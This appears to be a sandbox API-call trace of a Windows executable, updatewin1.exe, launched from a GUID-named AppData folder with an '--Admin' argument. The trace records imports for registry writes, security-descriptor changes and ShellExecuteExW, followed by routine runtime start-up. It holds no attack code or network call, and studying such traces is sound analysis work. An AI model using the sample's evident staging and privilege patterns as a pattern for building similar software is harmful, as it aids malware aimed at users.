GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0131.005] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0131.005] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0131.005] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0131.005] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0131.005] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0131.005] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0131.005] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0131.006] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0131.006] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0131.006] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0131.006] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileExW") returned 0x76d51811 [0131.006] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0131.006] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.006] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0131.006] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0131.006] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0131.006] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyExW") returned 0x777240fe [0131.006] GetProcAddress (hModule=0x77710000, lpProcName="SetSecurityDescriptorDacl") returned 0x7772415e [0131.006] GetProcAddress (hModule=0x77710000, lpProcName="InitializeSecurityDescriptor") returned 0x77724620 [0131.006] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0131.007] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0131.007] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0131.007] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0131.007] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0131.007] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0131.007] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0131.007] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0131.007] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0131.007] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754d0000 [0131.010] GetProcAddress (hModule=0x754d0000, lpProcName="atexit") returned 0x754ec544 [0131.010] atexit (param_1=0x6363e0) returned 0 [0131.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5dc | out: lpSystemTimeAsFileTime=0x18f5dc*(dwLowDateTime=0xc37186b0, dwHighDateTime=0x1d62438)) [0131.012] GetCurrentThreadId () returned 0x568 [0131.012] GetCurrentProcessId () returned 0xbf4 [0131.012] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5d4 | out: lpPerformanceCount=0x18f5d4*=25141368828) returned 1 [0131.028] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0131.030] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0131.030] GetLastError () returned 0x57 [0131.031] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0131.031] GetLastError () returned 0x57 [0131.031] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0131.031] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0131.031] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0131.031] GetLastError () returned 0x57 [0131.031] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0131.031] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0131.033] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0131.033] GetLastError () returned 0x57 [0131.033] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0131.033] GetLastError () returned 0x57 [0131.033] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0131.033] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0131.034] GetProcessHeap () returned 0x620000 [0131.034] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0131.034] GetLastError () returned 0x57 [0131.034] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0131.034] GetLastError () returned 0x57 [0131.034] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0131.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x364) returned 0x64a9f0 [0131.034] SetLastError (dwErrCode=0x57) [0131.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xc00) returned 0x64ad60 [0131.037] GetStartupInfoW (in: lpStartupInfo=0x18f510 | out: lpStartupInfo=0x18f510*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033b0, hStdOutput=0x1874dec1, hStdError=0xfffffffe)) [0131.037] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0131.037] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0131.037] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0131.037] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe\" --Admin" [0131.037] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe\" --Admin" [0131.037] IsValidCodePage (CodePage=0x4e4) returned 1 [0131.037] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f530 | out: lpCPInfo=0x18f530) returned 1 [0131.037] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18edf8 | out: lpCPInfo=0x18edf8) returned 1 [0131.037] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0131.037] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0131.037] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18ee0c | out: lpCharType=0x18ee0c) returned 1 [0131.038] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0131.038] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā") returned 256 [0131.039] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0131.039] GetLastError () returned 0x57 [0131.039] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0131.039] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0131.039] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x18e938, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0131.039] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f30c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x19{-\x18Hõ\x18", lpUsedDefaultChar=0x0) returned 256 [0131.039] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0131.039] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0131.039] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0131.039] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e958, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0131.039] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f20c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x19{-\x18Hõ\x18", lpUsedDefaultChar=0x0) returned 256 [0131.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x64a0d8 [0131.039] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x416cb8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe")) returned 0x5f [0131.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xdc) returned 0x64c168 [0131.039] RtlInitializeSListHead (in: ListHead=0x416bd8 | out: ListHead=0x416bd8) [0131.039] GetLastError () returned 0x0 [0131.039] GetEnvironmentStringsW () returned 0x64c250* [0131.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xaca) returned 0x64cd28 [0131.039] FreeEnvironmentStringsW (penv=0x64c250) returned 1 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x98) returned 0x64c250 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3e) returned 0x64c2f0 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x6c) returned 0x64c338 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x6e) returned 0x64c3b0 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x78) returned 0x631188 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x62) returned 0x64c428 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2e) returned 0x6352d8 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x48) returned 0x64c498 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x28) returned 0x64a160 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1a) returned 0x64bd18 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x4a) returned 0x64c4e8 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x72) returned 0x631208 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x30) returned 0x635310 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2e) returned 0x635348 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1c) returned 0x64bd40 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xd2) returned 0x64c540 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x7c) returned 0x64c620 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x36) returned 0x64c6a8 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3a) returned 0x64c6e8 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x90) returned 0x64c730 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x24) returned 0x64c7c8 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x30) returned 0x635380 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x36) returned 0x64c7f8 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x48) returned 0x64c838 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x52) returned 0x64c888 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3c) returned 0x64d818 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x82) returned 0x64c8e8 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2e) returned 0x6353b8 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1e) returned 0x64bd68 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2c) returned 0x6353f0 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x54) returned 0x64c978 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x52) returned 0x64c9d8 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2a) returned 0x635428 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3c) returned 0x64d860 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x54) returned 0x64ca38 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x24) returned 0x64ca98 [0131.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x30) returned 0x635460 [0131.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x8c) returned 0x64cac8 [0131.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64cd28 | out: hHeap=0x620000) returned 1 